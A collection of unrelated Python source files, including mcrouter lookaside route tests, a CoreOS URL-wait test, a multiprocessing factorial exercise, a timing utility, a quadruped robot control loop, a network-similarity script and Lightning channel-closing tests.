"before_latency_ms": $TEMPLATE_BEFORE_LATENCY,
"after_latency_ms": $TEMPLATE_AFTER_LATENCY,
}
}
}
"""
clientConfigFile = """
{
"pools": {
"A": {
"servers": [ "127.0.0.1:${TEMPLATE_PORT}" ]
}
},
"route": "PoolRoute|A"
}
"""
flavorConfigFile = """
{
"options": {
"asynclog_disable": "true",
"config": "${TEMPLATE_FILENAME}",
"failures_until_tko": "10",
"num_proxies": "4",
"probe_delay_initial_ms": "5000",
"scuba_sample_period": "0",
"server_timeout_ms": "250"
}
}
"""
def cleanup(self):
if self.tmpRouteFile:
os.remove(self.tmpRouteFile.name)
if self.tmpClientFile:
os.remove(self.tmpClientFile.name)
if self.tmpFlavorFile:
os.remove(self.tmpFlavorFile.name)
def __init__(self, prefix, ttl, port, lease_enable='false', lease_interval=0,
lease_num_retries=0, latency_before=0, latency_after=0):
# Client file configuration
with tempfile.NamedTemporaryFile(mode='w', delete=False) as self.tmpClientFile:
clientDict = {'TEMPLATE_PORT': port}
src = Template(self.clientConfigFile)
result = src.substitute(clientDict)
self.tmpClientFile.write(result)
# Flavor file configuration
with tempfile.NamedTemporaryFile(mode='w', delete=False) as self.tmpFlavorFile:
flavorDict = {'TEMPLATE_FILENAME': 'file:' + self.tmpClientFile.name}
src = Template(self.flavorConfigFile)
result = src.substitute(flavorDict)
self.tmpFlavorFile.write(result)
# Route file configuration
with tempfile.NamedTemporaryFile(mode='w', delete=False) as self.tmpRouteFile:
routeDict = {'TEMPLATE_PREFIX': prefix,
'TEMPLATE_TTL': ttl,
'TEMPLATE_FILENAME': 'file:' + self.tmpFlavorFile.name,
'TEMPLATE_LEASE_ENABLE': lease_enable,
'TEMPLATE_LEASE_WAIT_INTERVAL': lease_interval,
'TEMPLATE_LEASE_NUM_RETRIES': lease_num_retries,
'TEMPLATE_BEFORE_LATENCY': latency_before,
'TEMPLATE_AFTER_LATENCY': latency_after}
if latency_before or latency_after:
src = Template(self.routeLatencyConfigFile)
else:
src = Template(self.routeConfigFile)
result = src.substitute(routeDict)
self.tmpRouteFile.write(result)
def getFileName(self):
return self.tmpRouteFile.name
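# The three temporary files chain together: the route config embeds a reference
# to the flavor file, which points at the client config, which in turn targets
# the local memcached port. getFileName() therefore hands mcrouter a single
# top-level route config that pulls in the rest.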
class TestCarbonLookasideRouteBasic(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 120
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport())
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def test_carbonlookaside_basic(self):
n = 20
# Insert 20 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 20 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
# Query the items through mcrouter and check that they are there
# This query will be fed from carbonlookaside.
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
def test_carbonlookaside_larger(self):
n = 200
# Insert 200 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 200 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
# Query the items through mcrouter and check that they are there
# This query will be fed from carbonlookaside.
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
class TestCarbonLookasideRouteExpiry(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 2
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport())
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def test_carbonlookaside_ttl_expiry(self):
n = 20
# Insert 20 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 20 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
time.sleep(2)
# Query carbonlookaside directly and check they have expired
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertFalse(self.mc.get(key), 'value')
class TestCarbonLookasideRouteNoExpiry(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 0
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport())
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def test_carbonlookaside_ttl_no_expiry(self):
n = 20
# Insert 20 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value', exptime=2))
# Get the 20 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
time.sleep(3)
# Items should have expired in memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertFalse(self.mc.get(key), 'value')
# Items still available in carbonlookaside through mcrouter
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
class TestCarbonLookasideRouteLeases(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 0
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport(), 'true',
10, 10)
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def test_carbonlookaside_basic_leases(self):
n = 20
# Insert 20 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 20 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
# Query the items through mcrouter and check that they are there
# This query will be fed from carbonlookaside.
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
def test_carbonlookaside_larger_leases(self):
n = 200
# Insert 200 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 200 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
# Query the items through mcrouter and check that they are there
# This query will be fed from carbonlookaside.
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
class TestCarbonLookasideRouteLeasesHotMiss(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 0
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport(), 'true',
10, 3, 0, 5000)
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
self.mcrouter2 = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def async_get(self, key, ret):
ret.put(self.mcrouter.get(key))
def test_carbonlookaside_basic_leases(self):
# Add KV pair directly to MC to avoid backend latency and
# carbonlookaside interference
key = 'auld_lang_syne'
self.assertTrue(self.mc.set(key, 'value'))
# Make an async request for the key. It will initially do a lease get
# to carbonlookaside which will return a lease token. Note using a
# latency route here to slow things down so there is time to provoke
# a hot miss before backend responds and carbon lookaside does a lease
# set.
ret = Queue.Queue()
t = threading.Thread(target=self.async_get, args=(key, ret))
t.start()
# Ensure lease get has arrived at MC server before proceeding
stats = self.mc.stats()
while stats["cmd_lease_get"] == '0':
stats = self.mc.stats()
# Hot miss
self.assertTrue(self.mcrouter2.get(key), 'value')
stats = self.mc.stats()
self.assertTrue(stats["cmd_lease_get"] == '5')
# Now wait on the back end returning and the write to carbonLookaside
# completing.
t.join()
self.assertTrue(ret.get(), 'value')
stats = self.mc.stats()
# the lookaside sets don't block, so allow a few retries until the set arrives
# at the local MC server.
retry = 0
while stats["cmd_lease_set"] == '0' and retry < 3:
time.sleep(1)
retry += 1
stats = self.mc.stats()
self.assertTrue(stats["cmd_lease_set"] == '1')
self.assertTrue(stats["lease_tokens_in_use"] == '0')
|
test_block_until_url.py
|
#!/usr/bin/python3
# Copyright (c) 2013 The CoreOS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import http.server
import os
import select
import signal
import subprocess
import threading
import time
import unittest
from http import HTTPStatus
script_path = os.path.abspath('%s/../../bin/block-until-url' % __file__)
class UsageTestCase(unittest.TestCase):
def test_no_url(self):
proc = subprocess.Popen([script_path],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(proc.returncode, 1)
self.assertEqual(out, b'')
self.assertIn(b'invalid url', err)
def test_invalid_url(self):
proc = subprocess.Popen([script_path, 'fooshizzle'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(proc.returncode, 1)
self.assertEqual(out, b'')
self.assertIn(b'invalid url', err)
class TestRequestHandler(http.server.BaseHTTPRequestHandler):
def send_test_data(self):
if self.path == '/ok':
ok_data = b'OK!\n'
self.send_response(HTTPStatus.OK)
self.send_header('Content-type', 'text/plain')
self.send_header('Content-Length', str(len(ok_data)))
self.end_headers()
if self.command != 'HEAD':
self.wfile.write(ok_data)
elif self.path == '/404':
self.send_error(HTTPStatus.NOT_FOUND)
else:
# send nothing so curl fails
pass
def do_GET(self):
self.send_test_data()
def do_HEAD(self):
self.send_test_data()
def log_message(self, format, *args):
pass
class HttpTestCase(unittest.TestCase):
def setUp(self):
self.server = http.server.HTTPServer(
('localhost', 0), TestRequestHandler)
self.server_url = 'http://%s:%s' % (self.server.server_name, self.server.server_port)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.start()
def tearDown(self):
self.server.shutdown()
self.server_thread.join()
self.server.server_close()
def test_quick_ok(self):
proc = subprocess.Popen([script_path, '%s/ok' % self.server_url],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def test_quick_404(self):
proc = subprocess.Popen([script_path, '%s/404' % self.server_url],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def test_timeout(self):
proc = subprocess.Popen([script_path, '%s/bogus' % self.server_url],
bufsize=4096,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
timeout = time.time() + 2 # kill after 2 seconds
while time.time() < timeout:
time.sleep(0.1)
self.assertIs(proc.poll(), None, 'script terminated early!')
proc.terminate()
out, err = proc.communicate()
self.assertEqual(proc.returncode, -signal.SIGTERM)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
if __name__ == '__main__':
unittest.main()
|
Q8-4processos.py
|
# Given a vector A of size N containing only positive integers, compute the factorial of each element and store the results in a vector B,
# using the multiprocessing module with 4 processes.
import multiprocessing,random
def fatorial(n):
fat = n
for i in range(n - 1, 1, -1):
fat = fat * i
return (fat)
def fatorialProcesso(vetor,q,start,end):
for item in vetor[start:end]:
factorial = fatorial(item)
q.put(factorial)
return
def comProcessos(vetor,list_size,thread_num):
q = multiprocessing.Queue()
resposta = []
listaDeProcessos = []
for i in range(thread_num):
start = i * int(list_size // thread_num)
end = (i + 1) * int(list_size // thread_num)
p = multiprocessing.Process(target=fatorialProcesso, args=(vetor,q, start,end))
p.start()
listaDeProcessos.append(p)
for p in listaDeProcessos:
p.join()
while q.qsize() > 0:
resposta.append(q.get())
return resposta
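# Note: the workers push their factorials onto a shared Queue, so the list
# returned above contains the factorial of every element of the input vector,
# but not necessarily in the input's original order.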
if __name__ == "__main__":
n_threads = 4
VETOR_A = []
vetor = int(input("Digite o tamanho do vetor:"))
for i in range(1, vetor + 1):
vet = random.randint(1, 10)
VETOR_A.append(vet)
list_size = len(VETOR_A)
print("Vetor original:")
print(VETOR_A)
print("Novo vetor:")
print(comProcessos(VETOR_A,list_size,n_threads))
|
duration.py
|
# coding: utf-8
import time;
import re
from systemtools.basics import *
from threading import Thread
class Timer:
def __init__(self, callback, interval, sleepFirst=False, sleepCount=1000):
"""
interval: seconds between callback invocations; sleepCount: number of slices the wait is cut into so that stop() takes effect quickly
"""
self.sleepCount = sleepCount
self.interval = interval
self.callback = callback
self.stopped = True
self.firstExec = True
self.sleepFirst = sleepFirst
self.mainThread = None
def isRunning(self):
return not self.stopped
def sleep(self):
sleepPart = self.interval / self.sleepCount
for i in range(self.sleepCount):
if self.isRunning():
time.sleep(sleepPart)
def run(self):
self.stopped = False
while not self.stopped:
if self.firstExec and self.sleepFirst:
self.sleep()
if self.isRunning():
self.callback()
self.sleep()
self.firstExec = False
def start(self):
self.firstExec = True
self.mainThread = Thread(target=self.run)
self.mainThread.start()
def stop(self):
self.stopped = True
class TicToc():
"""
This class provides two methods for printing elapsed time during an execution
"""
def __init__(self, logger=None, marker="-->", msgSeparator=" | message: ", maxDecimal=2):
self.logger = logger
self.startTime = None;
self.previousTime = None;
self.marker = marker;
self.msgSeparator = msgSeparator;
self.maxDecimal = maxDecimal;
def setMaxDecimal(self, maxDecimal):
self.maxDecimal = maxDecimal;
def tic(self, msg=None, display=True):
"""
On the first call this method starts the timer; on subsequent calls it prints the time
elapsed since the previous tic(). An optional message can be passed to be printed alongside.
This is the local (per-step) duration.
"""
if msg is None:
msg = "";
else:
msg = self.msgSeparator + msg;
if self.startTime is None:
self.startTime = time.time();
self.previousTime = self.startTime;
if display:
self.p(self.marker + " tictoc starts..." + msg);
return -1;
else:
currentTime = time.time();
diffTime = currentTime - self.previousTime;
diffTime = float(float(int(diffTime * (10**self.maxDecimal))) / float((10**self.maxDecimal)));
if display:
self.p(self.marker + " tic: " + self.secondsToHumanReadableDuration(diffTime) + msg); # time duration from the previous tic()
self.previousTime = currentTime;
return diffTime;
def toc(self, msg=None, display=True):
"""
This method prints the elapsed time since the first tic().
An optional message can be passed to be printed alongside.
This is the total duration.
"""
if self.startTime is not None:
if msg is None:
msg = "";
else:
msg = self.msgSeparator + msg;
currentTime = time.time();
diffTime = currentTime - self.startTime;
diffTime = float(float(int(diffTime * (10**self.maxDecimal))) / float((10**self.maxDecimal)));
if display:
self.p(self.marker + " toc total duration: " + self.secondsToHumanReadableDuration(diffTime) + msg);
return diffTime;
return -1;
def p(self, text):
if self.logger is not None:
self.logger.p(text)
else:
print(text)
def secondsToHumanReadableDuration(self, seconds):
"""
:example:
>>> secondsToHumanReadableDuration(0.1)
'0.1s'
>>> secondsToHumanReadableDuration(10)
'10.0s'
>>> secondsToHumanReadableDuration(10.2)
'10.2s'
>>> secondsToHumanReadableDuration(3600)
'1h 0m 0.0s'
>>> secondsToHumanReadableDuration(7210)
'2h 0m 10.0s'
>>> secondsToHumanReadableDuration(7270)
'2h 1m 10.0s'
"""
m, s = divmod(seconds, 60.0)
h, m = divmod(m, 60.0)
h = int(h)
m = int(m)
result = ""
if h != 0:
result += str(h) + "h "
result += str(m) + "m "
elif m != 0:
result += str(m) + "m "
result += floatAsReadable(s) + "s"
return result
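# Minimal usage sketch (someCallback stands for any zero-argument callable of your own;
# floatAsReadable is imported above from systemtools.basics):
#
#   tt = TicToc()
#   tt.tic()                  # starts the clock
#   ...                       # some work
#   tt.tic("step done")       # prints the local duration since the previous tic()
#   tt.toc("all done")        # prints the total duration since the first tic()
#
#   t = Timer(someCallback, interval=60, sleepFirst=True)
#   t.start()                 # runs someCallback roughly every 60 s in a background thread
#   t.stop()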
|
run_robot.py
|
import os
import sys
import threading
import time
import numpy as np
from PIL import Image
from multiprocessing import Process
import multiprocessing
sys.path.append("/home/ubuntu/Robotics/QuadrupedRobot")
sys.path.extend([os.path.join(root, name) for root, dirs, _ in os.walk("/home/ubuntu/Robotics/QuadrupedRobot") for name in dirs])
from Mangdang.LCD.ST7789 import ST7789
from Mangdang.LCD.gif import AnimatedGif
from src.Controller import Controller
from src.JoystickInterface import JoystickInterface
from src.State import State
from pupper.MovementGroup import MovementLib
from src.MovementScheme import MovementScheme
from pupper.HardwareInterface import HardwareInterface
from pupper.Config import Configuration
from pupper.Kinematics import four_legs_inverse_kinematics
quat_orientation = np.array([1, 0, 0, 0])
cartoons_folder = "/home/ubuntu/Robotics/QuadrupedRobot/Mangdang/LCD/cartoons/"
current_show = ""
disp = ST7789()
def pic_show(disp, pic_name, _lock):
""" Show the specify picture
Parameter:
disp : display instance
pic_name : picture name to show
Return : None
"""
if pic_name == "":
return
global current_show
if pic_name == current_show:
return
image = Image.open(cartoons_folder + pic_name)
image = image.resize((320, 240))  # resize() returns a new image; keep it
_lock.acquire()
disp.display(image)
_lock.release()
current_show = pic_name
def animated_thr_fun(_disp, duration, is_connect, current_leg, _lock):
"""
The process function that plays the idle (sleep) animated GIF when the robot
has been inactive for "duration" seconds.
Parameters: _disp, duration, is_connect, current_leg, _lock
Return: None
"""
try:
gif_player = AnimatedGif(_disp, width=320, height=240, folder=cartoons_folder)
last_time = time.time()
last_joint_angles = np.zeros(3)
while True:
if is_connect.value == 1 :
#if ((current_leg[0]==last_joint_angles[0]) and (current_leg[1]==last_joint_angles[1]) and (current_leg[2]==last_joint_angles[2])) == False :
if ((current_leg[0]==last_joint_angles[0]) and (current_leg[1]==last_joint_angles[1])) == False :
last_time = time.time()
last_joint_angles[0] = current_leg[0]
last_joint_angles[1] = current_leg[1]
#last_joint_angles[2] = current_leg[2]
if (time.time() - last_time) > duration :
_lock.acquire()
gif_player.play()
_lock.release()
time.sleep(0.5)
else :
last_time = time.time()
time.sleep(1.5)
except KeyboardInterrupt:
_lock.release()
pass
def cmd_dump(cmd):
"""
Debug helper that prints all fields of a PS4 joystick command.
Parameter: cmd -- the command object to dump
Return: None
"""
print("\nGet PS4 command :")
print("horizontal_velocity: ", cmd.horizontal_velocity)
print("yaw_rate ", cmd.yaw_rate)
print("height", cmd.height)
print("pitch ", cmd.pitch)
print("roll ", cmd.roll)
print("activation ", cmd.activation)
print("hop_event ", cmd.hop_event)
print("trot_event ", cmd.trot_event)
print("activate_event ", cmd.activate_event)
def main():
"""Main program
"""
# sleep 2.5 s to wait for boot-up to complete
time.sleep(2.5)
# Create config
config = Configuration()
hardware_interface = HardwareInterface()
# show logo
global disp
disp.begin()
disp.clear()
image = Image.open(cartoons_folder + "logo.png")
image = image.resize((320, 240))  # resize() returns a new image; keep it
disp.display(image)
# Start animated process
duration = 10
is_connect = multiprocessing.Value('l', 0)
current_leg = multiprocessing.Array('d', [0, 0, 0])
lock = multiprocessing.Lock()
animated_process = Process(target=animated_thr_fun, args=(disp, duration, is_connect, current_leg, lock))
#animated_process.start()
#Create movement group scheme
movement_ctl = MovementScheme(MovementLib)
# Create controller and user input handles
controller = Controller(
config,
four_legs_inverse_kinematics,
)
state = State()
print("Creating joystick listener...")
joystick_interface = JoystickInterface(config)
print("Done.")
last_loop = time.time()
print("Summary of gait parameters:")
print("overlap time: ", config.overlap_time)
print("swing time: ", config.swing_time)
print("z clearance: ", config.z_clearance)
print("x shift: ", config.x_shift)
# Wait until the activate button has been pressed
while True:
print("Waiting for L1 to activate robot.")
while True:
command = joystick_interface.get_command(state)
joystick_interface.set_color(config.ps4_deactivated_color)
if command.activate_event == 1:
break
time.sleep(0.1)
print("Robot activated.")
is_connect.value = 1
joystick_interface.set_color(config.ps4_color)
pic_show(disp, "walk.png", lock)
while True:
now = time.time()
if now - last_loop < config.dt:
continue
last_loop = time.time()
# Parse the udp joystick commands and then update the robot controller's parameters
command = joystick_interface.get_command(state)
#cmd_dump(command)
_pic = "walk.png" if command.yaw_rate ==0 else "turnaround.png"
if command.trot_event == True:
_pic = "walk_r1.png"
pic_show(disp, _pic, lock)
if command.activate_event == 1:
is_connect.value = 0
pic_show(disp, "notconnect.png", lock)
print("Deactivating Robot")
break
state.quat_orientation = quat_orientation
# movement scheme
movement_switch = command.dance_switch_event
gait_state = command.trot_event
if gait_state == True: # if a trot event is triggered, reset the movement number to 0
movement_ctl.resetMovementNumber()
movement_ctl.runMovementScheme(movement_switch)
food_location = movement_ctl.getMovemenLegsLocation()
attitude_location = movement_ctl.getMovemenAttitudeLocation()
controller.run(state,command,food_location,attitude_location)
# Update the pwm widths going to the servos
hardware_interface.set_actuator_postions(state.joint_angles)
current_leg[0]= state.joint_angles[0][0]
current_leg[1]= state.joint_angles[1][0]
#current_leg[2]= state.joint_angles[2][0]
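# main() paces the control loop to config.dt by spinning on time.time(), feeds each
# joystick command through the MovementScheme and Controller, and writes the resulting
# joint angles to the servos; is_connect and current_leg are the values shared with the
# (currently disabled) animation process above.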
try:
main()
except KeyboardInterrupt:
pass
|
calc-network-collaborative-similarity-async.py
|
import os
import sys
import phpserialize
from multiprocessing import Process
from network import Network
__DIR__ = os.path.dirname(os.path.abspath(__file__))
if len(sys.argv) != 2 or not sys.argv[1].isdigit():
exit('usage: %s bucket' % sys.argv[0])
# read data file
infile = '%s/data/bucket-%03d.txt' % (__DIR__, int(sys.argv[1]))
f = open(infile)
links = phpserialize.load(f)
edges = 0
for words in links.get('users').itervalues():
edges += len(words)
def average_degree(network, alias, link_type):
print "<%s> = %f" % (alias, network.average_degree(link_type))
def network_collaborative_similarity(network, alias, link_type, link_n_type):
print "C_%s = %s" % (alias, network.network_collaborative_similarity(link_type, link_n_type, False))
def average_jaccard_similarity(network, alias, link_type, link_n_type):
print "s_%s = %s" % (alias, network.average_jaccard_similarity(link_type, link_n_type, False))
# print basic network info
print 'N = %d' % len(links.get('users'))
print 'M = %d' % len(links.get('objects'))
print 'E = %d' % edges
network = Network(links)
Process(target=average_degree, args=(network, 'k', 'users')).start()
Process(target=average_degree, args=(network, 'd', 'objects')).start()
Process(target=network_collaborative_similarity, args=(network, 'u', 'users', 'objects')).start()
Process(target=average_jaccard_similarity, args=(network, 'o', 'objects', 'users')).start()
Process(target=network_collaborative_similarity, args=(network, 'o', 'objects', 'users')).start()
Process(target=average_jaccard_similarity, args=(network, 'u', 'users', 'objects')).start()
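# Each metric runs in its own Process and prints its result to stdout on its own, so
# the output lines can appear in any order; the parent does not join() the children and
# simply lets them finish in the background.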
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from flaky import flaky
from lightning import RpcError
from utils import only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND, SLOW_MACHINE
import os
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind, chainparams):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
fee = 5430 if not chainparams['elements'] else 8955
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
# Only wait for the channels to activate with DEVELOPER=1,
# otherwise it's going to take too long because of the missing
# --dev-fast-gossip
if DEVELOPER:
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fund_channel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
